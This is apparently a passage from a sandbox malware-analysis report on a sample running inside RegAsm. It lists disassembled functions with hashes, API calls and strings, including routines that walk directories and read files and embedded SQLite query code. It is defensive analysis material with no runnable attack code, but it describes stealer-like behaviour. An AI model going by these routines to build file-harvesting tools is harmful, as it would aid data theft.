Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$FindH_prolog$FileHeaplstrlenmemsetwsprintf$AllocCloseFirstNextProcess
String ID: %s\%s$%s\*
API String ID: 4045355068-2848263008
Opcode ID: fe63926c6cd3cf97e4c5c529332d9ec6d2a4bf5927c7ff9333cc56acf6d7899e
Instruction ID: 567c827ee6608975b6beb6f2f07b68e66abb29bd87c872bfb5918980b20e7e96
Opcode Fuzzy Hash: fe63926c6cd3cf97e4c5c529332d9ec6d2a4bf5927c7ff9333cc56acf6d7899e
Instruction Fuzzy Hash: 77512B71D00218ABCB10EFA0EC49ADE77BDFF44314F0045AAF515E2191EB399B99CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 1994D9E0 Relevance: 23.3, APIs: 8, Strings: 5, Instructions: 564COMMON

Download Yara Rule

Strings

ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1994DACC, 1994DE2F
API called with finalized prepared statement, xrefs: 1994DAB0, 1994DE13
misuse, xrefs: 1994DAD6, 1994DE39
API called with NULL prepared statement, xrefs: 1994DA9B, 1994DDFE
%s at line %d of [%.10s], xrefs: 1994DADB, 1994DE3E

Memory Dump Source

Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true

Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$API called with NULL prepared statement$API called with finalized prepared statement$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
API String ID: 0-860711957
Opcode ID: ed089a279da9bf69910c8f571f2e438c39d966157c0368938b985bdf8293940f
Instruction ID: 0c68f2b67e15c579ae233aba161795c864399d12458b05ece06ee2f3599f37d2
Opcode Fuzzy Hash: ed089a279da9bf69910c8f571f2e438c39d966157c0368938b985bdf8293940f
Instruction Fuzzy Hash: 9712E2B89047419BE3238F24CD45B5777E8BF45308F2C452CE89A8B282E776F549CB92

Uniqueness

Uniqueness Score: -1.00%

Function 1984B400 Relevance: 21.4, APIs: 8, Strings: 4, Instructions: 367COMMON

Download Yara Rule

Strings

ASC, xrefs: 1984B651, 1984B678
DESC, xrefs: 1984B656, 1984B65E, 1984B67D, 1984B685
SELECT %s ORDER BY rowid %s, xrefs: 1984B665
SELECT %s WHERE rowid BETWEEN %lld AND %lld ORDER BY rowid %s, xrefs: 1984B696

Memory Dump Source

Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true

Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd

Similarity

API ID:
String ID: ASC$DESC$SELECT %s ORDER BY rowid %s$SELECT %s WHERE rowid BETWEEN %lld AND %lld ORDER BY rowid %s
API String ID: 0-3496276579
Opcode ID: 92ee90053a123345ddaf507b5cb9db29e4f803488371175f3e3a084cc88c38e9
Instruction ID: 3eeb083b83e414e1786e339704fdbc0e0ced2dd0beb05189fa8e63b65453e937
Opcode Fuzzy Hash: 92ee90053a123345ddaf507b5cb9db29e4f803488371175f3e3a084cc88c38e9
Instruction Fuzzy Hash: DBC175755007499FC7118F28D84176BB7E4FF94310F2C492EE88A8B681E73AF559CB92

Uniqueness

Uniqueness Score: -1.00%

Function 1989DB10 Relevance: 18.3, APIs: 12, Instructions: 265COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true

Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 82d7b3752d54328d53c7d33183843799bdd5639bd16ee0919a8f61b6d81503b8
Instruction ID: 1dc66dd6e7175522310cf5b3952b21faeb145ae76c8709a94f2fa4e5158273ac
Opcode Fuzzy Hash: 82d7b3752d54328d53c7d33183843799bdd5639bd16ee0919a8f61b6d81503b8
Instruction Fuzzy Hash: FF81DF76614305AFD710DF68CC80B2BB3E9EFC4718F48082DF9859B350E676E9458B96

Uniqueness

Uniqueness Score: -1.00%

Function 19904D40 Relevance: 18.0, APIs: 9, Strings: 1, Instructions: 476COMMON

Download Yara Rule

Strings

YHI;, xrefs: 19904D43

Memory Dump Source

Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true

Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd

Similarity

API ID:
String ID: YHI;
API String ID: 0-2037931556
Opcode ID: 93f81b3cf7c8747a55b9647336b4a5616545b3b81ad14a6349da893077f0ebfa
Instruction ID: 9f17d63907855cc7a60c56efb32eab6ab868cbf487c078f93fe7f5e43a96e0d0
Opcode Fuzzy Hash: 93f81b3cf7c8747a55b9647336b4a5616545b3b81ad14a6349da893077f0ebfa
Instruction Fuzzy Hash: 5DF1DFB05003429FD3119F69C894A2BB7FCEF81715F0D452CEDA8C6281E775E95ACBA2

Uniqueness

Uniqueness Score: -1.00%

Function 19850FB0 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 180COMMON

Download Yara Rule

Strings

e, xrefs: 1985115A

Memory Dump Source

Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true

Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd

Similarity

API ID:
String ID: e
API String ID: 0-4024072794
Opcode ID: 36bf8875baaf085edaede92fcfbfd96a80b42455c8294c9340591cc07f665f1e
Instruction ID: b1a0d6e1a9d666b7f6abd8596f1965fc4f4ed3acd8c7cffb23e3e76b9cbc3338
Opcode Fuzzy Hash: 36bf8875baaf085edaede92fcfbfd96a80b42455c8294c9340591cc07f665f1e
Instruction Fuzzy Hash: 3C5126766082419FEB04CF28DC80A67BBE5FF95311F1845AEF886C6591E731F858C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 1989DFC0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 131COMMON

Download Yara Rule

Strings

%lld %lld, xrefs: 1989E055

Memory Dump Source

Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true

Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd

Similarity

API ID:
String ID: %lld %lld
API String ID: 0-3794783949
Opcode ID: 7c3d56af4a68180cb52267c2259d888d2210e2aa9a9889fb0c684a4c5b50e315
Instruction ID: d204ca50db06b64b53695102591cbe155cbed2e4215a957669f0f2e003d05609
Opcode Fuzzy Hash: 7c3d56af4a68180cb52267c2259d888d2210e2aa9a9889fb0c684a4c5b50e315
Instruction Fuzzy Hash: AE31F5792042007FE7115B28CC45F6B7BAEEFC1710F58841CFA45962D2E772E912C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 199414D0 Relevance: 16.1, APIs: 4, Strings: 5, Instructions: 360COMMON

Download Yara Rule

Strings

ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 199415A2
API called with finalized prepared statement, xrefs: 19941586
misuse, xrefs: 199415AC
API called with NULL prepared statement, xrefs: 19941571
%s at line %d of [%.10s], xrefs: 199415B1

Memory Dump Source

Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true

Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$API called with NULL prepared statement$API called with finalized prepared statement$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
API String ID: 0-860711957
Opcode ID: c6335cccec1b92a25c72b4a4fb64f1623a58c8cc76b4d3c8a15fb6c62887a2d1
Instruction ID: 96fada86c6be6c90a74a7ffc5761172cc48f7f0b60a12f6a535cc62d2ad1a0f6
Opcode Fuzzy Hash: c6335cccec1b92a25c72b4a4fb64f1623a58c8cc76b4d3c8a15fb6c62887a2d1
Instruction Fuzzy Hash: 83C1C1F4B007419BE7338F28D945B5777ECBB60354F2C452CE88A8B282E776E4598792

Uniqueness

Uniqueness Score: -1.00%

Function 1994D4F0 Relevance: 16.1, APIs: 4, Strings: 5, Instructions: 310COMMON

Download Yara Rule

Strings

ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1994D5DD
API called with finalized prepared statement, xrefs: 1994D5C1
misuse, xrefs: 1994D5E7
API called with NULL prepared statement, xrefs: 1994D5AC
%s at line %d of [%.10s], xrefs: 1994D5EC

Memory Dump Source

Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true

Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$API called with NULL prepared statement$API called with finalized prepared statement$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
API String ID: 0-860711957
Opcode ID: 42b407a599f3dfa768687fc3a265225416395ade8129fc4ea6a70dab83f737ef
Instruction ID: 3fc29a011e0c820b81d8edc5043820dbe82d9fee1c64beb9c0f8566cfe817842
Opcode Fuzzy Hash: 42b407a599f3dfa768687fc3a265225416395ade8129fc4ea6a70dab83f737ef
Instruction Fuzzy Hash: 80B1E2B89047419FE3128F28C945B5777E8BF45308F28852CE8D98B381E776F459CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 004093C1 Relevance: 15.3, APIs: 10, Instructions: 301fileCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 004093C6

Part of subcall function 0040E2EA: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E314

Part of subcall function 0040E3EF: _EH_prolog.MSVCRT ref: 0040E3F4
Part of subcall function 0040E3EF: lstrcpy.KERNEL32(00000000), ref: 0040E440
Part of subcall function 0040E3EF: lstrcat.KERNEL32(?,?), ref: 0040E44A

Part of subcall function 0040E463: _EH_prolog.MSVCRT ref: 0040E468
Part of subcall function 0040E463: lstrlen.KERNEL32(?,00000000,00000014,?,?,00415C39,?,?,00424A48,?,00000000,004244C3), ref: 0040E490
Part of subcall function 0040E463: lstrcpy.KERNEL32(00000000), ref: 0040E4B7
Part of subcall function 0040E463: lstrcat.KERNEL32(?,?), ref: 0040E4C2

Part of subcall function 0040E3A8: lstrcpy.KERNEL32(00000000,?), ref: 0040E3E1

FindFirstFileA.KERNEL32(00000000,?,00000000,?,00423DD4,?,?,00423BD2,00000000), ref: 00409443
StrCmpCA.SHLWAPI(?,00423DD8), ref: 00409460
StrCmpCA.SHLWAPI(?,00423DDC), ref: 0040947A
StrCmpCA.SHLWAPI(?,00000000,?,?,?,00423DE0,?,?,00423BD3), ref: 00409511
StrCmpCA.SHLWAPI(?), ref: 00409592

Part of subcall function 00401128: _EH_prolog.MSVCRT ref: 0040112D

Part of subcall function 0040E321: lstrcpy.KERNEL32(00000000,FEF4858D), ref: 0040E347

Part of subcall function 004086DA: _EH_prolog.MSVCRT ref: 004086DF

FindNextFileA.KERNEL32(00000000,?), ref: 0040977B
FindClose.KERNEL32(00000000), ref: 0040978A

Memory Dump Source

Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: H_prologlstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
String ID:
API String ID: 2015904956-0
Opcode ID: aeb0717eeb547d0dca04c4836053a964822107278d7c0ca16cbdc1c9b2076cab
Instruction ID: 2928ef73ce396786150c9efe5f3babeae40c82e37941feca583e6cf38b7478b9
Opcode Fuzzy Hash: aeb0717eeb547d0dca04c4836053a964822107278d7c0ca16cbdc1c9b2076cab
Instruction Fuzzy Hash: BEC17371901248EACF10EBB6D946BDD7FB8AF05304F54446EE845B32C2DB785B18CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 004097DC Relevance: 14.4, APIs: 6, Strings: 2, Instructions: 420fileCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 004097E1

Part of subcall function 0040E2EA: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E314

Part of subcall function 0040E463: _EH_prolog.MSVCRT ref: 0040E468
Part of subcall function 0040E463: lstrlen.KERNEL32(?,00000000,00000014,?,?,00415C39,?,?,00424A48,?,00000000,004244C3), ref: 0040E490
Part of subcall function 0040E463: lstrcpy.KERNEL32(00000000), ref: 0040E4B7
Part of subcall function 0040E463: lstrcat.KERNEL32(?,?), ref: 0040E4C2

Part of subcall function 0040E3A8: lstrcpy.KERNEL32(00000000,?), ref: 0040E3E1

FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00423BD6,75B0AC90), ref: 0040983F
StrCmpCA.SHLWAPI(?,00423DEC), ref: 0040985C
StrCmpCA.SHLWAPI(?,00423DF0), ref: 00409876

Part of subcall function 0040E3EF: _EH_prolog.MSVCRT ref: 0040E3F4
Part of subcall function 0040E3EF: lstrcpy.KERNEL32(00000000), ref: 0040E440
Part of subcall function 0040E3EF: lstrcat.KERNEL32(?,?), ref: 0040E44A

Part of subcall function 0040F5DE: _EH_prolog.MSVCRT ref: 0040F5E3
Part of subcall function 0040F5DE: GetSystemTime.KERNEL32(?,00424398,00000000,00000001,00000000,004244BE,004244B3,004244B2,00000000,00000000), ref: 0040F623

Part of subcall function 00406138: _EH_prolog.MSVCRT ref: 0040613D
Part of subcall function 00406138: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00406160
Part of subcall function 00406138: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 00406177
Part of subcall function 00406138: LocalAlloc.KERNEL32(00000040,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00406193
Part of subcall function 00406138: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 004061AD
Part of subcall function 00406138: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 004061CE

Part of subcall function 0040E321: lstrcpy.KERNEL32(00000000,FEF4858D), ref: 0040E347

Part of subcall function 00401128: _EH_prolog.MSVCRT ref: 0040112D

Part of subcall function 00412F70: _EH_prolog.MSVCRT ref: 00412F75
Part of subcall function 00412F70: CreateThread.KERNEL32(00000000,00000000,00411D72,?,00000000,00000000), ref: 0041301B
Part of subcall function 00412F70: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 00413023

FindNextFileA.KERNEL32(00000000,?), ref: 00409D97
FindClose.KERNEL32(00000000), ref: 00409DA6

Strings

, xrefs: 00409D22
\*.*, xrefs: 00409801

Memory Dump Source

Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: H_prolog$Filelstrcpy$Find$CloseCreatelstrcat$AllocFirstHandleLocalNextObjectReadSingleSizeSystemThreadTimeWaitlstrlen
String ID: $\*.*
API String ID: 1275501236-3868368519
Opcode ID: 154ce69cdb7ab854ade205a18d18913b38e9bc629dc3cc948b8a58f007115d9d
Instruction ID: 59ffe572b51746dec3494985b69b5421d0e14d4bfb075f3e6b9f57112aa3d079
Opcode Fuzzy Hash: 154ce69cdb7ab854ade205a18d18913b38e9bc629dc3cc948b8a58f007115d9d
Instruction Fuzzy Hash: B8025F7180024CEADF05EBA2C956BDEBB78AF14308F1444AEE505732C2DF782B59DB65

Uniqueness

Uniqueness Score: -1.00%

Function 198D5940 Relevance: 12.4, APIs: 8, Instructions: 391COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true

Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aaf8f9c7eebee5ee5f75ebbf438699867cb97553ad5128541d6f8279882d6b9a
Instruction ID: cb2c486ac5e8d76fd89c29413f471b281f2ca39abca510521ca6eabfea53ad9d
Opcode Fuzzy Hash: aaf8f9c7eebee5ee5f75ebbf438699867cb97553ad5128541d6f8279882d6b9a
Instruction Fuzzy Hash: E0C17776E183455FF7108A2CCC82BDB77D1EFA2320F9C052FE4958729AE225E545C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 19823AA3 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 183COMMON

Download Yara Rule

APIs

GetUserDefaultLCID.KERNEL32 ref: 19A1365A
IsValidCodePage.KERNEL32(00000000), ref: 19A13698
IsValidLocale.KERNEL32(?,00000001), ref: 19A136AB
GetLocaleInfoW.KERNEL32(?,00001001,?,00000040), ref: 19A136F3
GetLocaleInfoW.KERNEL32(?,00001002,?,00000040), ref: 19A1370E

Strings

YHI;, xrefs: 19A1355A

Memory Dump Source

Source File: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true

Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
